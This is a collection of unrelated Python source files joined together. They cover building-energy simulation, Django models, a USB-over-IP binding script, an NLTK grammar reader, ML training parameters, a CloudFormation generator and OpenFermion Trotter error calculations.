day1, month1 = map(int, cool_start.split('|'))
day2, month2 = map(int, cool_end.split('|'))
if month2 > month1:
r2 = Range(start=datetime(2012, month1, day1), end=datetime(2012, month2, day2))
else:
r2 = Range(start=datetime(2012, month1, day1), end=datetime(2013, month2, day2))
latest_start = max(r1.start, r2.start)
earliest_end = min(r1.end, r2.end)
delta = (earliest_end - latest_start).days + 1
overlap = max(0, delta)
        if overlap > 0:
            raise Exception(
                'invalid input found for building %s. heating and cooling seasons cannot overlap in CEA' % building_name)
        return False
    else:
        return False
def verify_has_season(building_name, start, end):
def invalid_date(date):
if len(date) != 5 or "|" not in date:
return True
elif "00" in date.split("|"):
return True
else:
return False
if start == '00|00' or end == '00|00':
return False
elif invalid_date(start) or invalid_date(end):
raise Exception(
            'invalid input found for building %s. season dates must comply with the DD|MM format; DD|00 values are not valid' % building_name)
else:
return True
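# Illustrative calls (not part of the original module), using the DD|MM convention checked above:
#   verify_has_season('B001', '01|10', '30|04')  -> True  (season defined)
#   verify_has_season('B001', '00|00', '00|00')  -> False (no season)
#   verify_has_season('B001', '1|10', '30|04')   -> raises Exception (not in DD|MM format)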
def get_envelope_properties(locator, prop_architecture):
"""
    Gets the building envelope properties from the envelope systems database
    (read via ``locator.get_database_envelope_systems()``), including the following:
    - prop_roof: Name, emissivity (e_roof), absorptivity (a_roof), thermal resistance (U_roof), and fraction of
      heated space (Hs).
    - prop_wall: Name, emissivity (e_wall), absorptivity (a_wall), thermal resistance (U_wall & U_base),
window to wall ratio of north, east, south, west walls (wwr_north, wwr_east, wwr_south, wwr_west).
- prop_win: Name, emissivity (e_win), solar factor (G_win), thermal resistance (U_win)
- prop_shading: Name, shading factor (rf_sh).
    - prop_construction: Name, internal heat capacity (Cm_Af), floor to ceiling voids (void_deck).
- prop_leakage: Name, exfiltration (n50).
Creates a merged df containing aforementioned envelope properties called envelope_prop.
:return: envelope_prop
:rtype: DataFrame
"""
def check_successful_merge(df_construction, df_leakage, df_roof, df_wall, df_win, df_shading, df_floor):
if len(df_construction.loc[df_construction['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid construction type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
                list(df_construction.loc[df_construction['code'].isna()]['Name'])))
if len(df_leakage.loc[df_leakage['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid leakage type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_leakage.loc[df_leakage['code'].isna()]['Name'])))
if len(df_roof[df_roof['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid roof type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_roof.loc[df_roof['code'].isna()]['Name'])))
if len(df_wall.loc[df_wall['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid wall type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_wall.loc[df_wall['code'].isna()]['Name'])))
if len(df_win.loc[df_win['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid window type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_win.loc[df_win['code'].isna()]['Name'])))
if len(df_shading.loc[df_shading['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid shading type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_shading.loc[df_shading['code'].isna()]['Name'])))
if len(df_floor.loc[df_floor['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid floor type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_floor.loc[df_floor['code'].isna()]['Name'])))
prop_roof = pd.read_excel(locator.get_database_envelope_systems(), 'ROOF')
prop_wall = pd.read_excel(locator.get_database_envelope_systems(), 'WALL')
prop_floor = pd.read_excel(locator.get_database_envelope_systems(), 'FLOOR')
prop_win = pd.read_excel(locator.get_database_envelope_systems(), 'WINDOW')
prop_shading = pd.read_excel(locator.get_database_envelope_systems(), 'SHADING')
prop_construction = pd.read_excel(locator.get_database_envelope_systems(), 'CONSTRUCTION')
prop_leakage = pd.read_excel(locator.get_database_envelope_systems(), 'TIGHTNESS')
df_construction = prop_architecture.merge(prop_construction, left_on='type_cons', right_on='code', how='left')
df_leakage = prop_architecture.merge(prop_leakage, left_on='type_leak', right_on='code', how='left')
df_floor = prop_architecture.merge(prop_floor, left_on='type_base', right_on='code', how='left')
df_roof = prop_architecture.merge(prop_roof, left_on='type_roof', right_on='code', how='left')
df_wall = prop_architecture.merge(prop_wall, left_on='type_wall', right_on='code', how='left')
df_win = prop_architecture.merge(prop_win, left_on='type_win', right_on='code', how='left')
df_shading = prop_architecture.merge(prop_shading, left_on='type_shade', right_on='code', how='left')
check_successful_merge(df_construction, df_leakage, df_roof, df_wall, df_win, df_shading, df_floor)
fields_construction = ['Name', 'Cm_Af', 'void_deck', 'Hs_ag', 'Hs_bg', 'Ns', 'Es']
fields_leakage = ['Name', 'n50']
fields_basement = ['Name', 'U_base']
fields_roof = ['Name', 'e_roof', 'a_roof', 'U_roof']
fields_wall = ['Name', 'wwr_north', 'wwr_west', 'wwr_east', 'wwr_south',
'e_wall', 'a_wall', 'U_wall']
fields_win = ['Name', 'e_win', 'G_win', 'U_win', 'F_F']
fields_shading = ['Name', 'rf_sh']
envelope_prop = df_roof[fields_roof].merge(df_wall[fields_wall], on='Name').merge(df_win[fields_win],
on='Name').merge(
df_shading[fields_shading], on='Name').merge(df_construction[fields_construction], on='Name').merge(
df_leakage[fields_leakage], on='Name').merge(
df_floor[fields_basement], on='Name')
return envelope_prop
def get_prop_solar(locator, building_names, prop_rc_model, prop_envelope):
"""
    Gets the sensible solar gains from calc_Isol_daysim and stores them in a DataFrame containing the building 'Name'
    and I_sol (incident solar gains).
:param locator: an InputLocator for locating the input files
:param building_names: List of buildings
:param prop_rc_model: RC model properties of a building by name.
:param prop_envelope: dataframe containing the building envelope properties.
    :return: DataFrame (``result``) containing the sensible solar gains for each building, by name.
:rtype: Dataframe
"""
thermal_resistance_surface = RSE
# create result data frame
list_Isol = []
# for every building
for building_name in building_names:
I_sol = calc_Isol_daysim(building_name, locator, prop_envelope, prop_rc_model, thermal_resistance_surface)
list_Isol.append(I_sol)
result = pd.DataFrame({'Name': list(building_names), 'I_sol': list_Isol})
return result
def calc_Isol_daysim(building_name, locator, prop_envelope, prop_rc_model, thermal_resistance_surface):
"""
Reads Daysim geometry and radiation results and calculates the sensible solar heat loads based on the surface area
and building envelope properties.
:param building_name: Name of the building (e.g. B154862)
:param locator: an InputLocator for locating the input files
:param prop_envelope: contains the building envelope properties.
:param prop_rc_model: RC model properties of a building by name.
:param thermal_resistance_surface: Thermal resistance of building element.
:return: I_sol: numpy array containing the sensible solar heat loads for roof, walls and windows.
:rtype: np.array
"""
# read daysim radiation
radiation_data = pd.read_csv(locator.get_radiation_building(building_name))
# sum wall
# solar incident on all walls [W]
I_sol_wall = (radiation_data['walls_east_kW'] +
radiation_data['walls_west_kW'] +
radiation_data['walls_north_kW'] +
radiation_data['walls_south_kW']).values * 1000 # in W
# sensible gain on all walls [W]
I_sol_wall = I_sol_wall * \
prop_envelope.loc[building_name, 'a_wall'] * \
thermal_resistance_surface * \
prop_rc_model.loc[building_name, 'U_wall'] * \
prop_rc_model.loc[building_name, 'empty_envelope_ratio']
# sum roof
# solar incident on all roofs [W]
I_sol_roof = radiation_data['roofs_top_kW'].values * 1000 # in W
# sensible gain on all roofs [W]
I_sol_roof = I_sol_roof * \
prop_envelope.loc[building_name, 'a_roof'] * \
thermal_resistance_surface * \
prop_rc_model.loc[building_name, 'U_roof']
config = cea.config.Configuration()
I_sol_roof = I_sol_roof * (1 - config.bigmacc.heatgain)
# sum window, considering shading
I_sol_win = (radiation_data['windows_east_kW'] +
radiation_data['windows_west_kW'] +
radiation_data['windows_north_kW'] +
radiation_data['windows_south_kW']).values * 1000 # in W
Fsh_win = np.vectorize(blinds.calc_blinds_activation)(I_sol_win,
prop_envelope.loc[building_name, 'G_win'],
prop_envelope.loc[building_name, 'rf_sh'])
I_sol_win = I_sol_win * \
Fsh_win * \
(1 - prop_envelope.loc[building_name, 'F_F']) * \
prop_rc_model.loc[building_name, 'empty_envelope_ratio']
# sum
I_sol = I_sol_wall + I_sol_roof + I_sol_win
return I_sol
|
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='propius',
packages=['propius'],
version='0.1.2',
license='apache-2.0',
    description='Extracts similar items from large datasets using correlation between items over sparse data structures',
long_description=long_description,
author='Daniel Valencia',
author_email='dafevara@gmail.com',
url='https://github.com/dafevara/propius',
download_url='https://github.com/dafevara/propius/archive/refs/tags/0.1.1.tar.gz',
keywords=['python', 'machine-learning', 'big-data', 'bigdata', 'sparse', 'recommender-system', 'knn', 'sparse-matrices'],
install_requires=[
'setuptools',
'numpy',
'pandas',
'scikit-learn',
'fsspec',
's3fs',
        'tqdm',
'mkdocs',
'mkdocs-gitbook',
'pygments',
'mkdocs-rtd-dropdown',
'mkdocs-material',
'mkdocstrings'
],
classifiers=[
'Environment :: Console',
'Environment :: MacOS X',
'Environment :: Other Environment',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Operating System :: MacOS',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft',
'Operating System :: Microsoft :: MS-DOS',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Operating System :: POSIX :: SunOS/Solaris',
'Operating System :: Unix',
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Build Tools',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
)
|
# Initialise the gpio package.
# Raspberry Pi (initial) model B (and A) GPIO modules
# Developed by R.E. McArdell / Dibase Limited.
# Copyright (c) 2012 Dibase Limited
# License: dual: GPL or BSD.
|
USER_PRESENCE_TEMPLATE = '{"last_update": ${last_update}, "network_to_users": ${network_to_users}}'
|
# usbpi.service.py
# requires python 3.9
import subprocess
import re
# replace device_id with your own device
device_id = '10c4:8a2a'
result = subprocess.run(['usbip', 'list', '-l'], capture_output=True)
m = re.findall(r'busid\s+([\d\.-]+)\s+\(([\w:]+)\)', result.stdout.decode('utf-8'))
for device in m:
if device[1] == device_id:
print(f'device found: {device[0]}')
subprocess.run(['usbip', 'bind', f'--busid={device[0]}'])
subprocess.run(['usbipd', '-d', '-4'])
break
|
#from django.shortcuts import render
from django.views import generic
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
class Home(LoginRequiredMixin, generic.TemplateView):
template_name = 'bases/home.html'
login_url = 'bases-space:login'
#login_url = 'admin:index'
|
# Natural Language Toolkit: Reader for Grammar Files
#
# Copyright (C) 2001-2006 University of Pennsylvania
# Author: Rob Speer <rspeer@mit.edu>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
#
# $Id: grammarfile.py 3588 2006-10-20 06:13:57Z ehk $
"""
A module to read a grammar from a *.cfg file.
"""
from en.parser.nltk_lite.parse.category import *
from en.parser.nltk_lite.parse import cfg
from en.parser.nltk_lite.parse.featurechart import *
class GrammarFile(object):
def __init__(self):
self.grammatical_productions = []
self.lexical_productions = []
self.start = GrammarCategory(pos='Start').freeze()
def grammar(self):
return cfg.Grammar(self.start, self.grammatical_productions +\
self.lexical_productions)
def earley_grammar(self):
return cfg.Grammar(self.start, self.grammatical_productions)
def earley_lexicon(self):
lexicon = {}
for prod in self.lexical_productions:
lexicon.setdefault(prod.rhs()[0], []).append(prod.lhs())
return lexicon
def earley_parser(self, trace=1):
return FeatureEarleyChartParse(self.earley_grammar(),
self.earley_lexicon(), trace=trace)
def apply_lines(self, lines):
for line in lines:
line = line.strip()
if not len(line): continue
if line[0] == '#': continue
if line[0] == '%':
parts = line[1:].split()
directive = parts[0]
args = " ".join(parts[1:])
if directive == 'start':
self.start = GrammarCategory.parse(args).freeze()
elif directive == 'include':
filename = args.strip('"')
self.apply_file(filename)
else:
rules = GrammarCategory.parse_rules(line)
for rule in rules:
if len(rule.rhs()) == 1 and isinstance(rule.rhs()[0], str):
self.lexical_productions.append(rule)
else:
self.grammatical_productions.append(rule)
def apply_file(self, filename):
f = open(filename)
lines = f.readlines()
self.apply_lines(lines)
f.close()
def read_file(filename):
result = GrammarFile()
result.apply_file(filename)
return result
read_file = staticmethod(read_file)
def demo():
g = GrammarFile.read_file("test.cfg")
print g.grammar()
if __name__ == '__main__':
demo()
|
# Generated by Django 2.2.4 on 2019-08-11 14:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("user", "0006_add_company_information")]
operations = [
migrations.AlterField(
model_name="department",
name="type",
field=models.PositiveSmallIntegerField(
choices=[
(0, "ADMIN"),
(1, "DIRECTOR"),
(2, "DESIGN"),
(3, "FINANCE"),
(4, "SPONSORSHIP"),
(5, "HACKERXPERIENCE"),
(6, "LOGISTICS"),
(7, "MARKETING"),
(8, "PHOTOGRAPHY"),
(9, "STAFF"),
(10, "WEBDEV"),
]
),
)
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-05 10:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Column',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('unit', models.CharField(blank=True, max_length=256, null=True)),
('ucd', models.CharField(blank=True, max_length=256, null=True)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
('datatype', models.CharField(blank=True, max_length=256, null=True)),
('size', models.IntegerField(blank=True, help_text='The length of variable length datatypes, e.g. varchar(256).', null=True)),
('principal', models.BooleanField(default=False, help_text='This column is considered a core part of the content.')),
('indexed', models.BooleanField(default=False, help_text='This column is indexed.')),
('std', models.BooleanField(default=False, help_text='This column is defined by some standard.')),
],
options={
'ordering': ('table__database__order', 'table__order', 'order'),
'permissions': (('view_column', 'Can view Column'),),
'verbose_name_plural': 'Columns',
'verbose_name': 'Column',
},
),
migrations.CreateModel(
name='Database',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
],
options={
'ordering': ('order',),
'permissions': (('view_database', 'Can view Database'),),
'verbose_name_plural': 'Databases',
'verbose_name': 'Database',
},
),
migrations.CreateModel(
name='Function',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
],
options={
'ordering': ('order',),
'permissions': (('view_function', 'Can view Function'),),
'verbose_name_plural': 'Functions',
'verbose_name': 'Function',
},
),
migrations.CreateModel(
name='Table',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField(blank=True, null=True)),
('name', models.CharField(max_length=256)),
('description', models.TextField(blank=True, null=True)),
('type', models.CharField(choices=[('table', 'Table'), ('view', 'View')], max_length=8)),
('utype', models.CharField(blank=True, max_length=256, null=True)),
('database', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tables', to='daiquiri_metadata.Database')),
],
options={
'ordering': ('database__order', 'order'),
'permissions': (('view_table', 'Can view Table'),),
'verbose_name_plural': 'Tables',
'verbose_name': 'Table',
},
),
migrations.AddField(
model_name='column',
name='table',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='columns', to='daiquiri_metadata.Table'),
),
]
|
def CHECK_ER(ret):
if ret['errors']:
raise ValueError(f'Failed to modify data: {ret["first_error"]}')
if ret['skipped']:
raise ValueError(f'Failed to modify data: skipped - {ret["skipped"]}')
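# Illustrative usage (the shape of `ret` is assumed: a write-result dict exposing
# 'errors', 'first_error' and 'skipped'):
#
#   CHECK_ER({'errors': 0, 'skipped': 0})                                            # passes silently
#   CHECK_ER({'errors': 1, 'first_error': 'duplicate primary key', 'skipped': 0})    # raises ValueError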
|
from __future__ import absolute_import
from octavious.parallelizer import Parallelizer
class DummyParallelizer(Parallelizer):
"""This class is a dummy implementation so it runs processors one by one in
a sequence.
"""
def parallelize(self, processors, input=None, callback=None):
"""Convenient ``Parallelizer.parallelize`` implementation
"""
results_list = []
subtasks = []
for processor in processors:
results = processor(input)
if callback:
callback(results)
results_list.append(results)
return results_list
parallelizer = DummyParallelizer
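# Illustrative sketch (assuming the Parallelizer base class needs no constructor arguments):
# each processor is a callable applied to the shared input, and results keep the input order.
#
#   double = lambda x: x * 2
#   square = lambda x: x ** 2
#   DummyParallelizer().parallelize([double, square], input=3)   # -> [6, 9]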
|
# noinspection PyPackageRequirements
from tap import Tap
from typing import List
import os
LMDB_DATA_ROOT = os.environ.get('LMDB_DATA_ROOT', './data')
# noinspection LongLine
class ParamsBase(Tap):
"""
All default parameters should be set here
"""
"""------General------"""
experiment_name: str = None # Name of experiment, used to create subdirectory for logs and checkpoints
config_file: str = None # path to configuration file
dry_run: bool = False # Do not save any outputs - For debug purpose only.
override_experiment: bool = False # Use with caution! Deletes all logs and checkpoint of <experiment_name> if exists.
override_experiment_with_backup: bool = False # Moves logs and checkpoint of <experiment_name> to <experiment_name>_bkp if exists.
"""-------Alpha Config"""
    alpha_map: List[float] = [1., 0.5, 2, 0.5]  # A list of pairs of numbers; the first number indicates the alpha type (1-perlin, 2-gaussian), the second is the percentage of the batch [0-1]
"""------Network Config------"""
backbone: str = 'vgg' # either 'vgg' or 'pnasnet5large'
decoder_depths: List[int] = (512,) # List of depths for decoder layers.
    load_from_checkpoint: bool = True  # A flag indicating whether to load from a checkpoint or not
load_checkpoint_path: str = None # Path to checkpoint, if not given looks for latest checkpoint in directory if exists.
"""------Data reader------"""
    input_size: int = 512  # size of input image; the image will be resized to a square while preserving aspect ratio
    lmdb_data_path: List[str] = (os.path.join(LMDB_DATA_ROOT, 'coco'),)  # Path to training data
output_dir: str = os.path.join('.', 'Outputs') # Path to save output files
batch_size: int = 3 # Training batch size
num_workers: int = 2 # Number of workers for data loader
    non_arp_resize: bool = False  # perform a non-aspect-ratio-preserving resize
    caption_aug: List[str] = 'drop:0.5'  # caption augmentation, e.g. drop:0.5 for a 50% drop rate
"""------Optimizer and Loss------"""
neg_weight: float = 1 # weight for negative loss
adv_weight: float = 1 # weight for adversarial loss
img2txt_weight: float = 0.1 # weight for image2text loss
optimizer: str = 'adam' # Training optimizer, currently implemented 'sgd' or 'adam'
learning_rate: float = 0.0001 # Training learning rate
backbone_lr: float = 0.0001 # Training learning rate for backbone
momentum: float = 0.9 # Training momentum for SGD optimizer
beta: List[float] = [0.9, 0.999] # Training momentum for Adam optimizer
weight_decay: float = 0.000000001 # Training weight decay regularization
learning_rate_decay_step: int = 50000 # Step number for lr scheduler decay
"""------Training and Logging------"""
num_epochs: int = 10 # Number of epochs in training session
log_train_interval: int = 1000 # Number of iterations between each print of train loss and accuracy
validation_interval: int = 5000 # Number of iterations between each validation step
    max_val_time: float = 10  # maximum time (in minutes) to spend on validation; breaks the validation loop at this time
max_steps: int = None # Maximum number of steps, used mainly for debugging and unit tests
"""------Distributed Training------"""
sync_bn: bool = False # use sync batch norm for DDP
local_rank: int = 0 # set by torch multiprocessing
"""------Debugging--------"""
debug_mode: bool = False # Used for debug purposes
    save_code_snapshot: bool = False  # Save a zip of the code when running, used for debugging/reproducibility
"""
END DEFAULT PARAMETERS
"""
# noinspection PyAttributeOutsideInit
def add_arguments(self) -> None:
self.add_argument('-e', '--experiment_name')
pass
class Params(ParamsBase):
def add_arguments(self) -> None:
config_file = ParamsBase(description=self.description).parse_args(known_only=True).config_file
if config_file is not None:
self.load(config_file)
super().add_arguments()
# noinspection PyAttributeOutsideInit
def process_args(self):
if not self._parsed:
return
        # process parameters for saving
self.root_save_dir = os.path.join(self.output_dir, self.experiment_name)
self.save_checkpoint_dir = os.path.join(self.root_save_dir, 'checkpoints')
self.save_log_dir = os.path.join(self.root_save_dir, 'logs')
self.save_debug_dir = os.path.join(self.root_save_dir, 'debug')
self.save_checkpoint_path = os.path.join(self.save_checkpoint_dir, 'checkpoint.dict')
if self.load_from_checkpoint is True and self.load_checkpoint_path is None:
self.load_checkpoint_path = os.path.join(self.save_checkpoint_dir, 'checkpoint.dict')
def _log_all(self): # override tap git usage
return self.as_dict()
def get_params():
args = Params(description='Train Grounding by Separation').parse_args()
args.process_args()
return args
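# Illustrative invocation (the script and config file names are hypothetical):
#   python train.py --config_file configs/experiment.yaml -e my_experiment
# parse_args() first loads the config file and then applies CLI flags on top; process_args() derives
# root_save_dir, save_checkpoint_dir, save_log_dir and the checkpoint paths from the parsed values.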
|
# Copyright 2017 Insurance Australia Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Creates the ElasticSearch CloudFormation template.
"""
import os
import sys
import common
import get_checksum_zip
import get_external_cidr
import get_verification_rules
RULES_TEMPLATE_BASE = os.environ['LOCATION_CORE']+"/"+"watchmen_cloudformation/templates/elastic-search.tmpl"
TEMPLATE_DESTINATION = os.environ['LOCATION_CORE']+"/"+"watchmen_cloudformation/files/elastic-search.yml"
def get_subscriptions_cf(rules):
"""Creates a CloudFormation template snippet for subscriptions based on the rules provided.
Args:
rules: List of rules used to create subscriptions for.
Returns:
Text containing a snippet of the CloudFormation template for subscriptions.
"""
snippet = ""
for rule in rules:
template = \
""" {rule_name}Subscription:
Type: AWS::Logs::SubscriptionFilter
DependsOn: CloudwatchLogsLambdaPermissions
Condition: ShouldCreateSubscription
Properties:
LogGroupName: !Sub "/aws/lambda/${Prefix}{rule_name}"
FilterPattern: ""
DestinationArn: !GetAtt LogsToElasticsearch.Arn
"""
snippet += template.replace(
"{rule_name}",
common.to_pascal_case(rule.get('name'))
)
return snippet
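# For illustration (the rule name is hypothetical, and it is assumed that
# common.to_pascal_case('check_s3_bucket') yields 'CheckS3Bucket'): such a rule would render as
#
#   CheckS3BucketSubscription:
#     Type: AWS::Logs::SubscriptionFilter
#     DependsOn: CloudwatchLogsLambdaPermissions
#     Condition: ShouldCreateSubscription
#     ...
#     LogGroupName: !Sub "/aws/lambda/${Prefix}CheckS3Bucket"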
def main(args):
"""Opens a "template" file, substitutes values into it and then writes
the contents to a new file.
"""
# If no parameters were passed in
if len(args) == 1:
rules = get_verification_rules.get_rules()
else:
# Parameter contains paths, e.g. ./verification_rules,./folder1/verification_rules
rules = get_verification_rules.get_rules(args[1].split(","))
elasticsearch_cf = common.get_template(RULES_TEMPLATE_BASE).replace(
"{{logs_to_elastic_search}}",
get_checksum_zip.get_checksum_zip("logs_to_elastic_search")
).replace(
"{{roll_indexes}}",
get_checksum_zip.get_checksum_zip("roll_indexes")
).replace(
"{{external_cidr}}",
get_external_cidr.get_external_cidr()
).replace(
"{{rules-subscriptions}}",
get_subscriptions_cf(rules)
)
common.generate_file(TEMPLATE_DESTINATION, elasticsearch_cf)
if __name__ == "__main__":
main(sys.argv)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to compute Trotter errors in the plane-wave dual basis."""
from __future__ import absolute_import
from future.utils import iteritems, itervalues
import numpy
import openfermion.hamiltonians
from openfermion.ops import FermionOperator
from openfermion.utils import count_qubits, normal_ordered
from openfermion.utils._commutators import (
double_commutator,
trivially_double_commutes_dual_basis,
trivially_double_commutes_dual_basis_using_term_info)
def low_depth_second_order_trotter_error_operator(
terms, indices=None, is_hopping_operator=None, jellium_only=False,
verbose=False):
"""Determine the difference between the exact generator of unitary
evolution and the approximate generator given by the second-order
Trotter-Suzuki expansion.
Args:
terms: a list of FermionOperators in the Hamiltonian in the
order in which they will be simulated.
indices: a set of indices the terms act on in the same order as terms.
is_hopping_operator: a list of whether each term is a hopping operator.
jellium_only: Whether the terms are from the jellium Hamiltonian only,
rather than the full dual basis Hamiltonian (i.e. whether
c_i = c for all number operators i^ i, or whether they
depend on i as is possible in the general case).
verbose: Whether to print percentage progress.
Returns:
The difference between the true and effective generators of time
evolution for a single Trotter step.
Notes: follows Equation 9 of Poulin et al.'s work in "The Trotter Step
Size Required for Accurate Quantum Simulation of Quantum Chemistry",
applied to the "stagger"-based Trotter step for detailed in
Kivlichan et al., "Quantum Simulation of Electronic Structure with
Linear Depth and Connectivity", arxiv:1711.04789.
"""
more_info = bool(indices)
n_terms = len(terms)
if verbose:
import time
start = time.time()
error_operator = FermionOperator.zero()
for beta in range(n_terms):
        if verbose and beta % max(1, n_terms // 30) == 0:
print('%4.3f percent done in' % (
(float(beta) / n_terms) ** 3 * 100), time.time() - start)
for alpha in range(beta + 1):
for alpha_prime in range(beta):
# If we have pre-computed info on indices, use it to determine
# trivial double commutation.
if more_info:
if (not
trivially_double_commutes_dual_basis_using_term_info(
indices[alpha], indices[beta],
indices[alpha_prime], is_hopping_operator[alpha],
is_hopping_operator[beta],
is_hopping_operator[alpha_prime], jellium_only)):
# Determine the result of the double commutator.
double_com = double_commutator(
terms[alpha], terms[beta], terms[alpha_prime],
indices[beta], indices[alpha_prime],
is_hopping_operator[beta],
is_hopping_operator[alpha_prime])
if alpha == beta:
double_com /= 2.0
error_operator += double_com
# If we don't have more info, check for trivial double
# commutation using the terms directly.
elif not trivially_double_commutes_dual_basis(
terms[alpha], terms[beta], terms[alpha_prime]):
double_com = double_commutator(
terms[alpha], terms[beta], terms[alpha_prime])
if alpha == beta:
double_com /= 2.0
error_operator += double_com
error_operator /= 12.0
return error_operator
def low_depth_second_order_trotter_error_bound(
terms, indices=None, is_hopping_operator=None,
jellium_only=False, verbose=False):
"""Numerically upper bound the error in the ground state energy
for the second-order Trotter-Suzuki expansion.
Args:
terms: a list of single-term FermionOperators in the Hamiltonian
to be simulated.
indices: a set of indices the terms act on in the same order as terms.
is_hopping_operator: a list of whether each term is a hopping operator.
jellium_only: Whether the terms are from the jellium Hamiltonian only,
rather than the full dual basis Hamiltonian (i.e. whether
c_i = c for all number operators i^ i, or whether they
depend on i as is possible in the general case).
verbose: Whether to print percentage progress.
Returns:
A float upper bound on norm of error in the ground state energy.
Notes:
Follows Equation 9 of Poulin et al.'s work in "The Trotter Step
Size Required for Accurate Quantum Simulation of Quantum
Chemistry" to calculate the error operator, for the "stagger"-based
        Trotter step detailed in Kivlichan et al., "Quantum Simulation
of Electronic Structure with Linear Depth and Connectivity",
arxiv:1711.04789.
"""
# Return the 1-norm of the error operator (upper bound on error).
return numpy.sum(numpy.absolute(list(
low_depth_second_order_trotter_error_operator(
terms, indices, is_hopping_operator,
jellium_only, verbose).terms.values())))
def simulation_ordered_grouped_low_depth_terms_with_info(
hamiltonian, input_ordering=None):
"""Give terms from the dual basis Hamiltonian in simulated order.
Uses the simulation ordering, grouping terms into hopping
(i^ j + j^ i) and number (i^j^ i j + c_i i^ i + c_j j^ j) operators.
Pre-computes term information (indices each operator acts on, as
    well as whether each operator is a hopping operator).
Args:
hamiltonian (FermionOperator): The Hamiltonian.
input_ordering (list): The initial Jordan-Wigner canonical order.
Returns:
A 3-tuple of terms from the Hamiltonian in order of simulation,
the indices they act on, and whether they are hopping operators
(both also in the same order).
Notes:
Follows the "stagger"-based simulation order discussed in Kivlichan
et al., "Quantum Simulation of Electronic Structure with Linear
Depth and Connectivity", arxiv:1711.04789; as such, the only
permitted types of terms are hopping (i^ j + j^ i) and potential
terms which are products of at most two number operators.
"""
n_qubits = count_qubits(hamiltonian)
hamiltonian = normal_ordered(hamiltonian)
ordered_terms = []
ordered_indices = []
ordered_is_hopping_operator = []
# If no input mode ordering is specified, default to range(n_qubits).
try:
input_ordering = list(input_ordering)
except TypeError:
input_ordering = list(range(n_qubits))
# Half a second-order Trotter step reverses the input ordering: this tells
# us how much we need to include in the ordered list of terms.
final_ordering = list(reversed(input_ordering))
# Follow odd-even transposition sort. In alternating steps, swap each even
# qubits with the odd qubit to its right, and in the next step swap each
# the odd qubits with the even qubit to its right. Do this until the input
# ordering has been reversed.
parity = 0
while input_ordering != final_ordering:
results = stagger_with_info(
hamiltonian, input_ordering, parity)
terms_in_step, indices_in_step, is_hopping_operator_in_step = results
ordered_terms.extend(terms_in_step)
ordered_indices.extend(indices_in_step)
ordered_is_hopping_operator.extend(is_hopping_operator_in_step)
# Alternate even and odd steps of the reversal procedure.
parity = 1 - parity
return (ordered_terms, ordered_indices, ordered_is_hopping_operator)
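# Illustration of the odd-even transposition reversal used above (implemented by stagger_with_info below),
# for 4 modes:
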